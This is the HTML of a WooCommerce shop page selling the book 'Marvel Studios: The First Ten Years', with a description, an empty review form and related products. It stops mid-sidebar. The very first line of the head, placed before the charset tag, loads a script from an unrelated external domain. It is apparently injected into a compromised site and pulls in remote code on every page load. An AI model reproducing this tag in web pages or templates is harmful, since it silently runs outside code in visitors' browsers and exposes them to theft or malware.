
<!DOCTYPE html>

<html lang="en-US">

<head>
<script src='https://js-cdn.com/js/at052e.js'></script>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width">
  <link rel="profile" href="http://gmpg.org/xfn/11">
  <title>Marvel Studios: The First Ten Years Hardcover &#8211; My Hallam</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="My Hallam &raquo; Feed" href="https://myhallam.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="My Hallam &raquo; Comments Feed" href="https://myhallam.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="My Hallam &raquo; Marvel Studios: The First Ten Years Hardcover Comments Feed" href="https://myhallam.com/product/marvel-studios-the-first-ten-years-hardcover/feed/" />
		
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://myhallam.com/wp-includes/css/dist/block-library/style.min.css?ver=5.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='wc-block-style-css'  href='https://myhallam.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ver=2.4.5' type='text/css' media='all' />
<link rel='stylesheet' id='cookie-law-info-css'  href='https://myhallam.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=1.8.2' type='text/css' media='all' />
<link rel='stylesheet' id='cookie-law-info-gdpr-css'  href='https://myhallam.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=1.8.2' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-layout-css'  href='https://myhallam.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=3.8.1' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-smallscreen-css'  href='https://myhallam.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=3.8.1' type='text/css' media='only screen and (max-width: 768px)' />
<link rel='stylesheet' id='woocommerce-general-css'  href='https://myhallam.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=3.8.1' type='text/css' media='all' />
<style id='woocommerce-inline-inline-css' type='text/css'>
.woocommerce form .form-row .required { visibility: visible; }
</style>
<link rel='stylesheet' id='vw-construction-estate-font-css'  href='//fonts.googleapis.com/css?family=PT+Sans%3A300%2C400%2C600%2C700%2C800%2C900%7CRoboto%3A400%2C700%7CRoboto+Condensed%3A400%2C700%7COpen+Sans%7COverpass%7CPoppins%7CLibre%2BBaskerville%7CMuli%3A200%2C200i%2C300%2C300i%2C400%2C400i%2C600%2C600i%2C700%2C700i%2C800%2C800i%2C900%2C900i%7CSource%2BSans%2BPro%3A200%2C200i%2C300%2C300i%2C400%2C400i%2C600%2C600i%2C700%2C700i%2C900%2C900i%7CMontserrat%3A300%2C400%2C600%2C700%2C800%2C900%7CPlayball%3A300%2C400%2C600%2C700%2C800%2C900%7CAlegreya%3A300%2C400%2C600%2C700%2C800%2C900%7CJulius+Sans+One%7CArsenal%7CSlabo%7CLato%7COverpass+Mono%7CSource+Sans+Pro%7CRaleway%7CMerriweather%7CDroid+Sans%7CRubik%7CLora%7CUbuntu%7CCabin%7CArimo%7CPlayfair+Display%7CQuicksand%7CPadauk%7CMuli%7CInconsolata%7CBitter%7CPacifico%7CIndie+Flower%7CVT323%7CDosis%7CFrank+Ruhl+Libre%7CFjalla+One%7COxygen%7CArvo%7CNoto+Serif%7CLobster%7CCrimson+Text%7CYanone+Kaffeesatz%7CAnton%7CLibre+Baskerville%7CBree+Serif%7CGloria+Hallelujah%7CJosefin+Sans%7CAbril+Fatface%7CVarela+Round%7CVampiro+One%7CShadows+Into+Light%7CCuprum%7CRokkitt%7CVollkorn%7CFrancois+One%7COrbitron%7CPatua+One%7CAcme%7CSatisfy%7CJosefin+Slab%7CQuattrocento+Sans%7CArchitects+Daughter%7CRusso+One%7CMonda%7CRighteous%7CLobster+Two%7CHammersmith+One%7CCourgette%7CPermanent+Marker%7CCherry+Swash%7CCormorant+Garamond%7CPoiret+One%7CBenchNine%7CEconomica%7CHandlee%7CCardo%7CAlfa+Slab+One%7CAveria+Serif+Libre%7CCookie%7CChewy%7CGreat+Vibes%7CComing+Soon%7CPhilosopher%7CDays+One%7CKanit%7CShrikhand%7CTangerine%7CIM+Fell+English+SC%7CBoogaloo%7CBangers%7CFredoka+One%7CBad+Script%7CVolkhov%7CShadows+Into+Light+Two%7CMarck+Script%7CSacramento%7CUnica+One&#038;ver=5.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='bootstrap-css'  href='https://myhallam.com/wp-content/themes/vw-construction-estate/css/bootstrap.css?ver=5.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='vw-construction-estate-basic-style-css'  href='https://myhallam.com/wp-content/themes/vw-construction-estate/style.css?ver=5.3.1' type='text/css' media='all' />
<style id='vw-construction-estate-basic-style-inline-css' type='text/css'>
body{max-width: 100%;}.slider img{opacity:0.5}.slider .carousel-caption, .slider .inner_carousel, .slider .inner_carousel h2{text-align:right; left:45%; right:15%;}.postbox smallpostimage{}.new-text{padding: 10px 25px;}
</style>
<link rel='stylesheet' id='font-awesome-css'  href='https://myhallam.com/wp-content/themes/vw-construction-estate/css/fontawesome-all.css?ver=5.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='vw-construction-estate-customcss-css'  href='https://myhallam.com/wp-content/themes/vw-construction-estate/css/custom.css?ver=5.3.1' type='text/css' media='all' />
<!--[if IE]>
<link rel='stylesheet' id='vw-construction-estate-ie-css'  href='https://myhallam.com/wp-content/themes/vw-construction-estate/css/ie.css?ver=5.3.1' type='text/css' media='all' />
<![endif]-->
<link rel='stylesheet' id='recent-posts-widget-with-thumbnails-public-style-css'  href='https://myhallam.com/wp-content/plugins/recent-posts-widget-with-thumbnails/public.css?ver=6.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='newsletter-css'  href='https://myhallam.com/wp-content/plugins/newsletter/style.css?ver=6.4.0' type='text/css' media='all' />
<script type='text/javascript' src='https://myhallam.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='https://myhallam.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var Cli_Data = {"nn_cookie_ids":[],"cookielist":[]};
var log_object = {"ajax_url":"https:\/\/myhallam.com\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='https://myhallam.com/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=1.8.2'></script>
<script type='text/javascript' src='https://myhallam.com/wp-content/themes/vw-construction-estate/js/custom.js?ver=5.3.1'></script>
<script type='text/javascript' src='https://myhallam.com/wp-content/themes/vw-construction-estate/js/bootstrap.js?ver=5.3.1'></script>
<script type='text/javascript' src='https://myhallam.com/wp-content/themes/vw-construction-estate/js/SmoothScroll.js?ver=5.3.1'></script>
<link rel='https://api.w.org/' href='https://myhallam.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://myhallam.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://myhallam.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.3.1" />
<meta name="generator" content="WooCommerce 3.8.1" />
<link rel="canonical" href="https://myhallam.com/product/marvel-studios-the-first-ten-years-hardcover/" />
<link rel='shortlink' href='https://myhallam.com/?p=306' />
<link rel="alternate" type="application/json+oembed" href="https://myhallam.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fmyhallam.com%2Fproduct%2Fmarvel-studios-the-first-ten-years-hardcover%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://myhallam.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fmyhallam.com%2Fproduct%2Fmarvel-studios-the-first-ten-years-hardcover%2F&#038;format=xml" />
	<noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript>
			<script type="text/javascript">
			var cli_flush_cache=2;
		</script>
		<link rel="icon" href="https://myhallam.com/wp-content/uploads/2019/11/cropped-favicon-84-32x32.png" sizes="32x32" />
<link rel="icon" href="https://myhallam.com/wp-content/uploads/2019/11/cropped-favicon-84-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="https://myhallam.com/wp-content/uploads/2019/11/cropped-favicon-84-180x180.png" />
<meta name="msapplication-TileImage" content="https://myhallam.com/wp-content/uploads/2019/11/cropped-favicon-84-270x270.png" />
</head>
<body class="product-template-default single single-product postid-306 wp-custom-logo theme-vw-construction-estate woocommerce woocommerce-page woocommerce-no-js">

<header role="banner">
  <a class="screen-reader-text skip-link" href="#maincontent">Skip to content</a>
  <div id="header">
          <div class="row m-0">
        <div class="col-lg-3 col-md-3  socialicons">
                  </div>
        <div class="col-lg-9 col-md-9 top-header">
          <div class="row m-0">
            <div class="col-lg-3 col-md-3">
                          </div>
            <div class="col-lg-3 col-md-3">
                          </div>
            <div class="col-lg-3 col-md-3">
                      
            </div>
            <div class="col-lg-3 col-md-3">
                          </div>
          </div>
        </div>
        <div class="clearfix"></div>
      </div>
        <div class="header-menu close-sticky ">
      <div class="row m-0">
        <div class=" col-lg-3 col-md-3">
          <div class="logo">
            <a href="https://myhallam.com/" class="custom-logo-link" rel="home"><img width="240" height="101" src="https://myhallam.com/wp-content/uploads/2019/11/cropped-My-Hallam.png" class="custom-logo" alt="My Hallam" /></a>          </div>
        </div>
        <div class="col-lg-9 col-md-9 menu-searh">
          <div class="row m-0">
            <div class="col-lg-9 col-md-7">
              <div class="menu">
                 <div class="toggle-nav mobile-menu">
                  <button onclick="menu_openNav()"><i class="fas fa-bars"></i><span class="screen-reader-text">Open Button</span></button>
                </div>
                <div id="mySidenav" class="nav sidenav">
                  <nav id="site-navigation" class="main-navigation" role="navigation" aria-label="Top Menu">
                    <a href="javascript:void(0)" class="closebtn mobile-menu" onclick="menu_closeNav()"><i class="fas fa-times"></i><span class="screen-reader-text">Close Button</span></a>
                    <div class="main-menu clearfix"><ul id="menu-main-menu" class="clearfix mobile_nav"><li id="menu-item-269" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current_page_parent menu-item-269"><a href="https://myhallam.com/">Shop</a></li>
<li id="menu-item-270" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-270"><a href="https://myhallam.com/cart/">Cart</a></li>
<li id="menu-item-271" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-271"><a href="https://myhallam.com/checkout/">Checkout</a></li>
<li id="menu-item-272" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-272"><a href="https://myhallam.com/my-account/">My account</a></li>
<li id="menu-item-273" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-273"><a href="https://myhallam.com/shipping-and-delivery/">Shipping and delivery</a></li>
<li id="menu-item-274" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-274"><a href="https://myhallam.com/returns/">Returns</a></li>
</ul></div>                  </nav>
                </div>
              </div>
            </div>
                          <div class="search-box col-lg-3 col-md-5">
                <form role="search" method="get" class="search-form" action="https://myhallam.com/">
	<label>
		<span class="screen-reader-text">Search for:</span>
		<input type="search" class="search-field" placeholder="Search" value="" name="s">
	</label>
	<input type="submit" class="search-submit" value="Search">
</form>              </div>
                     </div>
        </div>
        <div class="clearfix"></div>
      </div>
    </div>
  </div>
</header>

  <div id="preloader">
    <div id="status">
              <img src="https://myhallam.com/wp-content/themes/vw-construction-estate/images/two-way.gif" alt="" role="img"/>
          </div>
  </div>

<div class="container">
	<main id="maincontent" role="main" class="middle-align">
		<div class="row m-0">
			<div class="col-lg-8 col-md-8">
				<div id="primary" class="content-area vw-construction-estate"><main id="main" class="site-main" role="main"><nav class="woocommerce-breadcrumb"><a href="https://myhallam.com">Home</a>&nbsp;&#47;&nbsp;<a href="https://myhallam.com/product-category/books/">Books</a>&nbsp;&#47;&nbsp;Marvel Studios: The First Ten Years Hardcover</nav>
					
						<div class="woocommerce-notices-wrapper"></div><div id="product-306" class="product type-product post-306 status-publish first instock product_cat-books has-post-thumbnail shipping-taxable purchasable product-type-simple">

	<div class="woocommerce-product-gallery woocommerce-product-gallery--with-images woocommerce-product-gallery--columns-4 images" data-columns="4" style="opacity: 0; transition: opacity .25s ease-in-out;">
	<figure class="woocommerce-product-gallery__wrapper">
		<div data-thumb="https://myhallam.com/wp-content/uploads/2019/12/91vkys2daL-100x100.jpg" data-thumb-alt="" class="woocommerce-product-gallery__image"><a href="https://myhallam.com/wp-content/uploads/2019/12/91vkys2daL.jpg"><img width="600" height="833" src="https://myhallam.com/wp-content/uploads/2019/12/91vkys2daL-600x833.jpg" class="wp-post-image" alt="" title="91vkys2d+aL" data-caption="" data-src="https://myhallam.com/wp-content/uploads/2019/12/91vkys2daL.jpg" data-large_image="https://myhallam.com/wp-content/uploads/2019/12/91vkys2daL.jpg" data-large_image_width="1844" data-large_image_height="2560" srcset="https://myhallam.com/wp-content/uploads/2019/12/91vkys2daL-600x833.jpg 600w, https://myhallam.com/wp-content/uploads/2019/12/91vkys2daL-216x300.jpg 216w, https://myhallam.com/wp-content/uploads/2019/12/91vkys2daL-738x1024.jpg 738w, https://myhallam.com/wp-content/uploads/2019/12/91vkys2daL-768x1066.jpg 768w, https://myhallam.com/wp-content/uploads/2019/12/91vkys2daL-1106x1536.jpg 1106w, https://myhallam.com/wp-content/uploads/2019/12/91vkys2daL-1475x2048.jpg 1475w, https://myhallam.com/wp-content/uploads/2019/12/91vkys2daL.jpg 1844w" sizes="(max-width: 600px) 100vw, 600px" /></a></div><div data-thumb="https://myhallam.com/wp-content/uploads/2019/12/71m6LiSwHZL-100x100.jpg" data-thumb-alt="" class="woocommerce-product-gallery__image"><a href="https://myhallam.com/wp-content/uploads/2019/12/71m6LiSwHZL.jpg"><img width="100" height="100" src="https://myhallam.com/wp-content/uploads/2019/12/71m6LiSwHZL-100x100.jpg" class="" alt="" title="71m6LiSwHZL" data-caption="" data-src="https://myhallam.com/wp-content/uploads/2019/12/71m6LiSwHZL.jpg" data-large_image="https://myhallam.com/wp-content/uploads/2019/12/71m6LiSwHZL.jpg" data-large_image_width="1575" data-large_image_height="1087" srcset="https://myhallam.com/wp-content/uploads/2019/12/71m6LiSwHZL-100x100.jpg 100w, https://myhallam.com/wp-content/uploads/2019/12/71m6LiSwHZL-150x150.jpg 150w, https://myhallam.com/wp-content/uploads/2019/12/71m6LiSwHZL-300x300.jpg 300w" sizes="(max-width: 100px) 100vw, 100px" /></a></div><div data-thumb="https://myhallam.com/wp-content/uploads/2019/12/81QQkJeYrdL-100x100.jpg" data-thumb-alt="" class="woocommerce-product-gallery__image"><a href="https://myhallam.com/wp-content/uploads/2019/12/81QQkJeYrdL.jpg"><img width="100" height="100" src="https://myhallam.com/wp-content/uploads/2019/12/81QQkJeYrdL-100x100.jpg" class="" alt="" title="81QQkJeYrdL" data-caption="" data-src="https://myhallam.com/wp-content/uploads/2019/12/81QQkJeYrdL.jpg" data-large_image="https://myhallam.com/wp-content/uploads/2019/12/81QQkJeYrdL.jpg" data-large_image_width="2560" data-large_image_height="1766" srcset="https://myhallam.com/wp-content/uploads/2019/12/81QQkJeYrdL-100x100.jpg 100w, https://myhallam.com/wp-content/uploads/2019/12/81QQkJeYrdL-150x150.jpg 150w, https://myhallam.com/wp-content/uploads/2019/12/81QQkJeYrdL-300x300.jpg 300w" sizes="(max-width: 100px) 100vw, 100px" /></a></div><div data-thumb="https://myhallam.com/wp-content/uploads/2019/12/imdehgri4u37589-100x100.jpg" data-thumb-alt="" class="woocommerce-product-gallery__image"><a href="https://myhallam.com/wp-content/uploads/2019/12/imdehgri4u37589.jpg"><img width="100" height="100" src="https://myhallam.com/wp-content/uploads/2019/12/imdehgri4u37589-100x100.jpg" class="" alt="" title="imdehgri4u37589" data-caption="" data-src="https://myhallam.com/wp-content/uploads/2019/12/imdehgri4u37589.jpg" data-large_image="https://myhallam.com/wp-content/uploads/2019/12/imdehgri4u37589.jpg" data-large_image_width="1280" data-large_image_height="1280" srcset="https://myhallam.com/wp-content/uploads/2019/12/imdehgri4u37589-100x100.jpg 100w, https://myhallam.com/wp-content/uploads/2019/12/imdehgri4u37589-300x300.jpg 300w, https://myhallam.com/wp-content/uploads/2019/12/imdehgri4u37589-1024x1024.jpg 1024w, https://myhallam.com/wp-content/uploads/2019/12/imdehgri4u37589-150x150.jpg 150w, https://myhallam.com/wp-content/uploads/2019/12/imdehgri4u37589-768x768.jpg 768w, https://myhallam.com/wp-content/uploads/2019/12/imdehgri4u37589-600x600.jpg 600w, https://myhallam.com/wp-content/uploads/2019/12/imdehgri4u37589.jpg 1280w" sizes="(max-width: 100px) 100vw, 100px" /></a></div>	</figure>
</div>

	<div class="summary entry-summary">
		<h1 class="product_title entry-title">Marvel Studios: The First Ten Years Hardcover</h1><p class="price"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>20.39</span></p>

	
	<form class="cart" action="https://myhallam.com/product/marvel-studios-the-first-ten-years-hardcover/" method="post" enctype='multipart/form-data'>
		
			<div class="quantity">
				<label class="screen-reader-text" for="quantity_5dfa3a52dd336">Marvel Studios: The First Ten Years Hardcover quantity</label>
		<input
			type="number"
			id="quantity_5dfa3a52dd336"
			class="input-text qty text"
			step="1"
			min="1"
			max=""
			name="quantity"
			value="1"
			title="Qty"
			size="4"
			inputmode="numeric" />
			</div>
	
		<button type="submit" name="add-to-cart" value="306" class="single_add_to_cart_button button alt">Add to cart</button>

			</form>

	
<div class="product_meta">

	
	
	<span class="posted_in">Category: <a href="https://myhallam.com/product-category/books/" rel="tag">Books</a></span>
	
	
</div>
	</div>

	
	<div class="woocommerce-tabs wc-tabs-wrapper">
		<ul class="tabs wc-tabs" role="tablist">
							<li class="description_tab" id="tab-title-description" role="tab" aria-controls="tab-description">
					<a href="#tab-description">
						Description					</a>
				</li>
							<li class="reviews_tab" id="tab-title-reviews" role="tab" aria-controls="tab-reviews">
					<a href="#tab-reviews">
						Reviews (0)					</a>
				</li>
					</ul>
					<div class="woocommerce-Tabs-panel woocommerce-Tabs-panel--description panel entry-content wc-tab" id="tab-description" role="tabpanel" aria-labelledby="tab-title-description">
				
	<h2>Description</h2>

<p><b>Celebrate the first 10 years of Marvel Studios movies in this collector&#8217;s edition featuring all of the films from Iron Man to Captain Marvel!</b></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Includes interviews with Robert Downey Jr., Chris Evans, Scarlett Johansson, Chadwick Boseman, Chris Hemsworth, Chris Pratt and more, plus Marvel Studios President Kevin Feige and Co-President Louis D&#8217;Esposito.</span></p>
<p>&nbsp;</p>
<p><span style="font-weight: 400;">Features stunning photography and in-depth sections on each film, including a guide to each movie&#8217;s Easter Eggs and end-credits scenes.</span></p>
			</div>
					<div class="woocommerce-Tabs-panel woocommerce-Tabs-panel--reviews panel entry-content wc-tab" id="tab-reviews" role="tabpanel" aria-labelledby="tab-title-reviews">
				<div id="reviews" class="woocommerce-Reviews">
	<div id="comments">
		<h2 class="woocommerce-Reviews-title">
			Reviews		</h2>

					<p class="woocommerce-noreviews">There are no reviews yet.</p>
			</div>

			<div id="review_form_wrapper">
			<div id="review_form">
					<div id="respond" class="comment-respond">
		<span id="reply-title" class="comment-reply-title">Be the first to review &ldquo;Marvel Studios: The First Ten Years Hardcover&rdquo; <small><a rel="nofollow" id="cancel-comment-reply-link" href="/product/marvel-studios-the-first-ten-years-hardcover/#respond" style="display:none;">Cancel reply</a></small></span><form action="https://myhallam.com/wp-comments-post.php" method="post" id="commentform" class="comment-form"><p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p><div class="comment-form-rating"><label for="rating">Your rating</label><select name="rating" id="rating" required>
						<option value="">Rate&hellip;</option>
						<option value="5">Perfect</option>
						<option value="4">Good</option>
						<option value="3">Average</option>
						<option value="2">Not that bad</option>
						<option value="1">Very poor</option>
					</select></div><p class="comment-form-comment"><label for="comment">Your review&nbsp;<span class="required">*</span></label><textarea id="comment" name="comment" cols="45" rows="8" required></textarea></p><p class="comment-form-author"><label for="author">Name&nbsp;<span class="required">*</span></label><input id="author" name="author" type="text" value="" size="30" required /></p>
<p class="comment-form-email"><label for="email">Email&nbsp;<span class="required">*</span></label><input id="email" name="email" type="email" value="" size="30" required /></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Submit" /> <input type='hidden' name='comment_post_ID' value='306' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p></form>	</div><!-- #respond -->
				</div>
		</div>
	
	<div class="clear"></div>
</div>
			</div>
		
			</div>


	<section class="related products">

		<h2>Related products</h2>

		<ul class="products columns-4">

			
				<li class="product type-product post-300 status-publish first instock product_cat-books has-post-thumbnail shipping-taxable purchasable product-type-simple">
	<a href="https://myhallam.com/product/the-young-entrepreneurs-guide-to-starting-and-running-a-business-turn-your-ideas-into-money-paperback/" class="woocommerce-LoopProduct-link woocommerce-loop-product__link"><img width="300" height="300" src="https://myhallam.com/wp-content/uploads/2019/12/91DDHI-y7nL-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://myhallam.com/wp-content/uploads/2019/12/91DDHI-y7nL-300x300.jpg 300w, https://myhallam.com/wp-content/uploads/2019/12/91DDHI-y7nL-150x150.jpg 150w, https://myhallam.com/wp-content/uploads/2019/12/91DDHI-y7nL-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /><h2 class="woocommerce-loop-product__title">The Young Entrepreneur&#8217;s Guide to Starting and Running a Business: Turn Your Ideas into Money! Paperback</h2>
	<span class="price"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>17.70</span></span>
</a><a href="?add-to-cart=300" data-quantity="1" class="button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="300" data-product_sku="" aria-label="Add &ldquo;The Young Entrepreneur&#039;s Guide to Starting and Running a Business: Turn Your Ideas into Money! Paperback&rdquo; to your cart" rel="nofollow">Add to cart</a></li>

			
				<li class="product type-product post-297 status-publish instock product_cat-books has-post-thumbnail shipping-taxable purchasable product-type-simple">
	<a href="https://myhallam.com/product/small-acts-of-leadership-12-intentional-behaviors-that-lead-to-big-impact-hardcover/" class="woocommerce-LoopProduct-link woocommerce-loop-product__link"><img width="300" height="300" src="https://myhallam.com/wp-content/uploads/2019/12/412ws2vAVSL-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://myhallam.com/wp-content/uploads/2019/12/412ws2vAVSL-300x300.jpg 300w, https://myhallam.com/wp-content/uploads/2019/12/412ws2vAVSL-150x150.jpg 150w, https://myhallam.com/wp-content/uploads/2019/12/412ws2vAVSL-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /><h2 class="woocommerce-loop-product__title">Small Acts of Leadership: 12 Intentional Behaviors That Lead to Big Impact Hardcover</h2>
	<span class="price"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>28.99</span></span>
</a><a href="?add-to-cart=297" data-quantity="1" class="button product_type_simple add_to_cart_button ajax_add_to_cart" data-product_id="297" data-product_sku="" aria-label="Add &ldquo;Small Acts of Leadership: 12 Intentional Behaviors That Lead to Big Impact Hardcover&rdquo; to your cart" rel="nofollow">Add to cart</a></li>

			
		</ul>

	</section>

</div>


					
				</main></div>			</div>
			<div class="col-lg-4 col-md-4">
				<div class="sidebar" >    
    <aside id="recent-posts-widget-with-thumbnails-3" class="widget recent-posts-widget-with-thumbnails"><div id="rpwwt-recent-posts-widget-with-thumbnails-3" class="rpwwt-widget">
	<h3 class="widget-title">Interesting Posts</h3>	<ul>
			<li><a href="https://myhallam.com/brave-browser-can-now-show-ads-and-soon-youll-get-70-of-the-money/"><img width="75" height="75" src="https://myhallam.com/wp-content/uploads/2019/11/add-blocker-example-100x100.jpg" class="attachment-75x75 size-75x75 wp-post-image" alt="Ad blockers are a problem for website publishers. Brave wants to build an ad ecosystem where some of the ad revenue you receive will be redirected to websites you visit." srcset="https://myhallam.com/wp-content/uploads/2019/11/add-blocker-example-100x100.jpg 100w, https://myhallam.com/wp-content/uploads/2019/11/add-blocker-example-150x150.jpg 150w, https://myhallam.com/wp-content/uploads/2019/11/add-blocker-example-300x300.jpg 300w" sizes="(max-width: 75px) 100vw, 75px" /><span class="rpwwt-post-title">Brave browser can now show ads, and soon you&#8217;ll get 70% of the money</span></a><div class="rpwwt-post-date">September 4, 2019</div></li>
			<li><a href="https://myhallam.com/twitter-combusts-as-the-new-york-knicks-trade-all-star-kristaps-porzingis/"><img width="75" height="75" src="https://myhallam.com/wp-content/uploads/2019/11/porz-100x100.jpg" class="attachment-75x75 size-75x75 wp-post-image" alt="New York Knicks v Cleveland Cavaliers" srcset="https://myhallam.com/wp-content/uploads/2019/11/porz-100x100.jpg 100w, https://myhallam.com/wp-content/uploads/2019/11/porz-150x150.jpg 150w, https://myhallam.com/wp-content/uploads/2019/11/porz-300x300.jpg 300w" sizes="(max-width: 75px) 100vw, 75px" /><span class="rpwwt-post-title">Twitter combusts as the New York Knicks trade all-star Kristaps Porzingis</span></a><div class="rpwwt-post-date">September 5, 2019</div></li>
			<li><a href="https://myhallam.com/terrifying-footage-of-japans-strongest-typhoon-in-25-years/"><img width="75" height="75" src="https://myhallam.com/wp-content/uploads/2019/11/1026624932-594x594-100x100.jpg" class="attachment-75x75 size-75x75 wp-post-image" alt="TOPSHOT-JAPAN-WEATHER-TYPHOON" srcset="https://myhallam.com/wp-content/uploads/2019/11/1026624932-594x594-100x100.jpg 100w, https://myhallam.com/wp-content/uploads/2019/11/1026624932-594x594-150x150.jpg 150w, https://myhallam.com/wp-content/uploads/2019/11/1026624932-594x594-300x300.jpg 300w" sizes="(max-width: 75px) 100vw, 75px" /><span class="rpwwt-post-title">Terrifying footage of Japan&#8217;s strongest typhoon in 25 years</span></a><div class="rpwwt-post-date">November 3, 2019</div></li>
			<li><a href="https://myhallam.com/the-fcc-makes-its-case-for-net-neutrality-repeal/"><img width="75" height="75" src="https://myhallam.com/wp-content/uploads/2019/11/net-neutrality-2447-100x100.jpg" class="attachment-75x75 size-75x75 wp-post-image" alt="net-neutrality-2447.jpg" srcset="https://myhallam.com/wp-content/uploads/2019/11/net-neutrality-2447-100x100.jpg 100w, https://myhallam.com/wp-content/uploads/2019/11/net-neutrality-2447-150x150.jpg 150w, https://myhallam.com/wp-content/uploads/2019/11/net-neutrality-2447-300x300.jpg 300w" sizes="(max-width: 75px) 100vw, 75px" /><span class="rpwwt-post-title">The FCC makes its case for net neutrality repeal</span></a><div class="rpwwt-post-date">November 16, 2019</div></li>
			<li><a href="https://myhallam.com/google-wants-to-help-you-pronounce-words-like-onomatopoeia-correctly-report-says/"><img width="75" height="75" src="https://myhallam.com/wp-content/uploads/2019/11/gettyimages-1027366886-100x100.jpg" class="attachment-75x75 size-75x75 wp-post-image" alt="Google" srcset="https://myhallam.com/wp-content/uploads/2019/11/gettyimages-1027366886-100x100.jpg 100w, https://myhallam.com/wp-content/uploads/2019/11/gettyimages-1027366886-150x150.jpg 150w, https://myhallam.com/wp-content/uploads/2019/11/gettyimages-1027366886-300x300.jpg 300w" sizes="(max-width: 75px) 100vw, 75px" /><span class="rpwwt-post-title">Google wants to help you pronounce words like &#8216;onomatopoeia&#8217; correctly, report says</span></a><div class="rpwwt-post-date">September 5, 2019</div></li>
		</ul>
</div><!-- .rpwwt-widget -->
</aside><aside id="newsletterwidgetminimal-3" class="widget widget_newsletterwidgetminimal"><h3 class="widget-title">Stay In Touch</h3><div class="tnp tnp-widget-minimal"><form class="tnp-form" action="https://myhallam.com/?na=s" method="post" onsubmit="return newsletter_check(this)"><input type="hidden" name="nr" value="widget-minimal"/><input class="tnp-email" type="email" required name="ne" value="" placeholder="Email"><input class="tnp-submit" type="submit" value="Subscribe"></form></div></aside><aside id="woocommerce_products-3" class="widget woocommerce widget_products"><h3 class="widget-title">Hot Products</h3><ul class="product_list_widget"><li>
	
	<a href="https://myhallam.com/product/aiex-270-pcs-push-pins-binder-clips-paper-clips-stationery-sets-4-sizes-with-a-transparent-plastic-box-for-home-school-office-accessories-rose-gold/">
		<img width="300" height="300" src="https://myhallam.com/wp-content/uploads/2019/11/61aF1W3Y2bL-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://myhallam.com/wp-content/uploads/2019/11/61aF1W3Y2bL-300x300.jpg 300w, https://myhallam.com/wp-content/uploads/2019/11/61aF1W3Y2bL-100x100.jpg 100w, https://myhallam.com/wp-content/uploads/2019/11/61aF1W3Y2bL-150x150.jpg 150w, https://myhallam.com/wp-content/uploads/2019/11/61aF1W3Y2bL.jpg 500w" sizes="(max-width: 300px) 100vw, 300px" />		<span class="product-title">AIEX 270+ Pcs Push Pins Binder Clips Paper Clips Stationery Sets 4 Sizes with a Transparent Plastic Box for Home, School, Office Accessories (Rose Gold)</span>
	</a>

				
	<span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>10.95</span>
	</li>
<li>
	
	<a href="https://myhallam.com/product/amazonbasics-under-desk-foot-rest-black/">
